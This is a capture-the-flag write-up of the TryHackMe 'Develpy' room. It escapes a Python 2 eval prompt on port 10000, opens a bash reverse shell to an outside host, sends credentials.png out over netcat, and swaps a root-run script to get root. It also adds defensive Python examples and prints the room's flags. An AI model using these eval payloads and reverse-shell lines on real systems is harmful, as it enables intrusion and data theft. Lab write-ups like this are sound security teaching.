TryHackMe Writeup - Develpy Room

☕ 4 min read · 👨‍💻 g4nd1v

Title: https://tryhackme.com/room/bsidesgtdevelpy
Description: boot2root machine for FIT and bsides Guatemala CTF
Difficulty: Medium
Maker: https://tryhackme.com/p/stuxnet

Nmap

```
└─$ nmap 10.10.224.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 18:52 EST
Nmap scan report for 10.10.224.39
Host is up (0.096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
10000/tcp open  snet-sensor-mgmt
```
```
└─$ nmap -n -sV --script "ndmp-fs-info" -p 10000 10.10.224.39
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-23 18:55 EST
Stats: 0:01:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Stats: 0:01:51 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.224.39
Host is up (0.093s latency).

PORT      STATE SERVICE           VERSION
10000/tcp open  snet-sensor-mgmt?
| fingerprint-strings:
|   GenericLines:
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 0
|     SyntaxError: unexpected EOF while parsing
|   GetRequest:
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 1, in <module>
|     NameError: name 'GET' is not defined
|   HTTPOptions, RTSPRequest:
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 1, in <module>
|     NameError: name 'OPTIONS' is not defined
|   NULL:
|     Private 0days
|_    Please enther number of exploits to send??:
```

So a Python service is running on port 10000; the tracebacks show it is evaluating whatever nmap sends to the prompt. We can connect to it with nc.

```
└─$ nc 10.10.224.39 10000

        Private 0days

 Please enther number of exploits to send??: 1

Exploit started, attacking target (tryhackme.com)...
Exploiting tryhackme internal network: beacons_seq=1 ttl=1337 time=0.064 ms
```

Maybe a pyjail? I don’t know, let’s try!

user flag

Bypass Python sandboxes

Voila, it worked!

```
└─$ nc 10.10.224.39 10000

        Private 0days

 Please enther number of exploits to send??: __builtins__.__import__("os").system("ls")
credentials.png  exploit.py  root.sh  run.sh  user.txt

Exploit started, attacking target (tryhackme.com)...
```
```
└─$ nc 10.10.224.39 10000

        Private 0days

 Please enther number of exploits to send??: __builtins__.__import__("os").system("cat user.txt")
cf85ff769cfaaa721758949bf870b019

Exploit started, attacking target (tryhackme.com)...
```
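
The root cause is visible in the nmap fingerprint: `int(input(...))` on a Python 2 interpreter, where `input()` evaluates the client's text as a Python expression before `int()` ever sees it (hence the `SyntaxError` and `NameError` tracebacks for nmap's probes). The following is an added example, not the room's exploit.py, that reproduces that behaviour under Python 3 with an explicit `eval()` next to the hardened form a maintainer should have written: a parser that accepts only a short run of ASCII digits within a bounded range, and a classifier so rejected lines can be logged. The `MAX_EXPLOITS` bound and the sample inputs are assumptions.

```python
"""Why the prompt on port 10000 is exploitable, and a hardened replacement.

Added example, not the room's exploit.py. Under Python 2, input() is
eval(raw_input()): whatever the client types is evaluated as a Python
expression before int() ever sees it. unsafe_parse_count() reproduces that
behaviour under Python 3 with an explicit eval(); safe_parse_count() is the
form a maintainer should have used.
"""
import re


def unsafe_parse_count(user_text: str) -> int:
    """Python 2 behaviour of int(input(...)): evaluate first, convert second."""
    # "1" -> 1 as intended, but "1+1" -> 2, and any other expression runs too.
    return int(eval(user_text))  # deliberately vulnerable, kept for comparison only


# Only ASCII digits: \d would also accept Unicode digits, which int() converts.
_COUNT_RE = re.compile(r"[0-9]{1,4}")
MAX_EXPLOITS = 1000  # assumed upper bound for the prompt


def safe_parse_count(user_text: str) -> int:
    """Accept a short run of ASCII digits within a bounded range, nothing else."""
    text = user_text.strip()
    if not _COUNT_RE.fullmatch(text):
        raise ValueError("expected a positive integer")
    n = int(text)
    if not 1 <= n <= MAX_EXPLOITS:
        raise ValueError(f"count must be between 1 and {MAX_EXPLOITS}")
    return n


def classify_input(user_text: str) -> str:
    """Tag a client line as 'ok' or 'rejected' so rejections can be logged."""
    try:
        safe_parse_count(user_text)
        return "ok"
    except ValueError:
        return "rejected"


if __name__ == "__main__":
    # Constructed sample lines, as a client might type them at the prompt.
    for sample in ["1", " 42 ", "1+1", "0", "10000", "x"]:
        print(f"{sample!r:10} -> {classify_input(sample)}")
```

The regex deliberately uses `[0-9]` rather than `\d`: in Python 3, `\d` matches any Unicode decimal digit and `int()` happily converts them, so a "digits only" check written with `\d` is looser than it looks.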

Next, connect back with a reverse bash shell.

root flag

Use this to get the reverse shell: `__builtins__.__import__("os").system("bash -c 'bash -i >& /dev/tcp/10.8.95.227/4444 0>&1'")`

We get a shell as the king user.

There is a file named credentials.png; we have to download it using nc.

```
On your machine
nc -l -p 1234 -q 1 > credentials.png < /dev/null

On King's machine
cat credentials.png | netcat 10.8.95.227 1234
```

Well, it does not seem like a PNG file, and I was not able to crack it (yes, yes, I checked a writeup for it later). It was Piet programming (https://www.bertnase.de/npiet/). Anyway…

Here we can read root.sh and, since it sits in king's own home directory, delete it as well, even though the file itself is owned by root.

```
king@ubuntu:~$ ls -al
ls -al
total 324
drwxr-xr-x 4 king king   4096 Aug 27  2019 .
drwxr-xr-x 3 root root   4096 Aug 25  2019 ..
-rw------- 1 root root   2929 Aug 27  2019 .bash_history
-rw-r--r-- 1 king king    220 Aug 25  2019 .bash_logout
-rw-r--r-- 1 king king   3771 Aug 25  2019 .bashrc
drwx------ 2 king king   4096 Aug 25  2019 .cache
-rwxrwxrwx 1 king king 272113 Aug 27  2019 credentials.png
-rwxrwxrwx 1 king king    408 Aug 25  2019 exploit.py
drwxrwxr-x 2 king king   4096 Aug 25  2019 .nano
-rw-rw-r-- 1 king king      5 Feb 23 17:12 .pid
-rw-r--r-- 1 king king    655 Aug 25  2019 .profile
-rw-r--r-- 1 root root     32 Aug 25  2019 root.sh
-rw-rw-r-- 1 king king    139 Aug 25  2019 run.sh
-rw-r--r-- 1 king king      0 Aug 25  2019 .sudo_as_admin_successful
-rw-rw-r-- 1 king king     33 Aug 27  2019 user.txt
-rw-r--r-- 1 root root    183 Aug 25  2019 .wget-hsts
```

Next, remove the root.sh file, create a new file with the same name, and put a reverse shell in it.
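
The weakness that makes this step work is not the mode of root.sh (it is `-rw-r--r-- root root`, so king cannot edit it) but the ownership of the directory holding it: the owner of a directory can unlink any entry in it and create a new one with the same name. A script that root executes is therefore only as trustworthy as every directory on its path. The following is an added audit example, not part of the room, that models that rule over an `ls`-style inventory; the `/home/king` entries are taken from the listing above, while the `/etc/cron.d/backup.sh` and `/tmp/job.sh` entries are hypothetical, added to show a correctly placed script and the sticky-bit case.

```python
"""Audit a root-executed script for a delete-and-replace weakness.

Added example, not part of the room. Inventory format: path -> (owner, group,
mode string exactly as ls -l prints it). The /home/king entries mirror the
listing in the writeup; the /etc/cron.d and /tmp entries are hypothetical.
"""
import posixpath

# Constructed inventory (owner, group, ls-style mode).
LISTING = {
    "/": ("root", "root", "drwxr-xr-x"),
    "/home": ("root", "root", "drwxr-xr-x"),
    "/home/king": ("king", "king", "drwxr-xr-x"),
    "/home/king/root.sh": ("root", "root", "-rw-r--r--"),
    "/home/king/run.sh": ("king", "king", "-rw-rw-r--"),
    "/etc": ("root", "root", "drwxr-xr-x"),
    "/etc/cron.d": ("root", "root", "drwxr-xr-x"),
    "/etc/cron.d/backup.sh": ("root", "root", "-rwxr-xr-x"),  # hypothetical, sane placement
    "/tmp": ("root", "root", "drwxrwxrwt"),                    # hypothetical, sticky bit set
    "/tmp/job.sh": ("root", "root", "-rwxr-xr-x"),             # hypothetical
}


def _write_bits(mode):
    """Return (owner_w, group_w, other_w, sticky) from an ls-style mode string."""
    p = mode[1:]  # drop the type character
    return p[1] == "w", p[4] == "w", p[7] == "w", p[8] in "tT"


def non_root_can_write(entry):
    """True if some non-root principal can modify the object's contents."""
    owner, group, mode = entry
    owner_w, group_w, other_w, _ = _write_bits(mode)
    return (owner != "root" and owner_w) or (group != "root" and group_w) or other_w


def non_root_can_replace_in(dir_entry):
    """True if a non-root user can unlink a root-owned entry in this directory."""
    owner, group, mode = dir_entry
    owner_w, group_w, other_w, sticky = _write_bits(mode)
    if owner != "root" and owner_w:
        return True   # the directory owner may always unlink entries
    if sticky:
        return False  # sticky bit: only the file owner, directory owner or root may unlink
    return (group != "root" and group_w) or other_w


def ancestors(path):
    """Directories from / down to the parent of path, in that order."""
    dirs = []
    cur = path
    while cur != "/":
        cur = posixpath.dirname(cur)
        dirs.append(cur)
    return list(reversed(dirs))


def audit_root_script(listing, script_path):
    """List the ways a non-root user could change what root ends up executing."""
    findings = []
    owner, group, mode = listing[script_path]
    if non_root_can_write(listing[script_path]):
        findings.append(f"{script_path} is writable by a non-root user ({owner}:{group} {mode})")
    for d in ancestors(script_path):
        d_owner, d_group, d_mode = listing[d]
        if non_root_can_replace_in(listing[d]):
            findings.append(
                f"{d} allows a non-root user to unlink entries ({d_owner}:{d_group} {d_mode}); "
                f"{script_path} can be deleted and replaced even though it is {owner}-owned"
            )
    return findings


if __name__ == "__main__":
    for script in ("/home/king/root.sh", "/home/king/run.sh", "/etc/cron.d/backup.sh", "/tmp/job.sh"):
        print(script, "->", audit_root_script(LISTING, script) or "no findings")
```

Run against the inventory, root.sh yields exactly one finding, naming `/home/king`, while the cron.d placement and the sticky-bit `/tmp` case yield none; the fix on the defending side is the one the cron.d entry shows, a root-owned script in a root-owned, non-world-writable directory.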


And boom, we got root!

```
root@ubuntu:/home/king# cat /root/root.txt
cat /root/root.txt
9c37646777a53910a347f387dce025ec
root@ubuntu:/home/king#
```
Written by g4nd1v, Pentester